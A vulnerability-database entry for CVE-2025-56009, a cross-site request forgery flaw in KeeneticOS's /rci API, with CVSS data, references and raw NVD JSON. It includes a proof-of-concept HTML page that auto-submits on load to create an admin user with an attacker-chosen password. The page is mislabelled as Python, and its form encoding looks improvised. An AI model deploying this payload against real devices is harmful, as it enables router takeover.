CVE-2025-56009

Description

Cross site request forgery (CSRF) vulnerability in KeeneticOS before 4.3 at "/rci" API endpoint allows attackers to take over the device via adding additional users with full permissions by managing the victim to open page with exploit.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:* - VULNERABLE

KeeneticOS < 4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-56009 - Add admin user -->
<html>
<body>
<h2>CVE-2025-56009 CSRF Exploit</h2>
<p>KeeneticOS < 4.3 /rci API CSRF to add admin user</p>

<form action="http://[TARGET_IP]/rci" method="POST" id="exploit">
  <input type="hidden" name="[\"user\", \"add\", \"testuser\"]" value="" />
  <input type="hidden" name="[\"user\", \"testuser\", \"password\"]" value="AttackerPass123" />
  <input type="hidden" name="[\"user\", \"testuser\", \"role\"]" value="admin" />
</form>

<script>
  // Auto-submit the form when page loads
  document.getElementById('exploit').submit();
</script>

<p>If you see this message, the exploit has been sent.</p>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56009
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56009
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56009/
[4] VulDB https://vuldb.com/cve/CVE-2025-56009
[5] https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56009.md
[6] https://keenetic.com/
[7] https://keenetic.com/global/security#october-2025-web-api-vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56009", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:39.347", "lastModified": "2026-05-20T20:16:35.300", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross site request forgery (CSRF) vulnerability in KeeneticOS before 4.3 at \"/rci\" API endpoint allows attackers to take over the device via adding additional users with full permissions by managing the victim to open page with exploit."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3", "matchCriteriaId": "31463ACE-A8BB-4E5D-AA71-1BC479DE8AA4"}]}]}], "references": [{"url": "https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56009.md", "source": "[email protected]"}, {"url": "https://keenetic.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://keenetic.com/global/security#october-2025-web-api-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}